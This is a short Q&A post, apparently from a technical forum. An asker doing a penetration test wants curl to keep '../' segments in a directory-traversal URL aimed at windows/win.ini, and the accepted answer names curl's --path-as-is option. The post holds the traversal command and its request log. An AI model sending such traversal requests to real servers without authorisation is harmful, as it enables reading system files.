# Prevent curl (or wget) from removing "../" from target URL?

Tags: security, curl, wget

During a penetration test, I want to query a specific URL containing `../` for a directory vulnerability:

```
curl http://eurosql2.domain.local:7002/../../../../../../../../../../../../windows/win.ini
```

Now, the problem is that `curl` (and `wget`) truncates this URL by removing ALL `../`:

```
* Rebuilt URL to: http://eurosql2.domain.local:7002/windows/win.ini
*   Trying 192.168.0.24...
* TCP_NODELAY set
* Connected to eurosql2.domain.local (192.168.0.24) port 7002 (#0)
> GET /windows/win.ini HTTP/1.1
> Host: eurosql2.domain.local:7002
> User-Agent: curl/7.60.0
> Accept: */*
> 
* Empty reply from server
* Connection #0 to host eurosql2.domain.local left intact
curl: (52) Empty reply from server
```

How is it possible to prevent `curl` (or `wget`) from removing these `../`?

Answer (score 4, accepted):

curl features the [--path-as-is](https://curl.haxx.se/docs/manpage.html#--path-as-is) for exactly this purpose!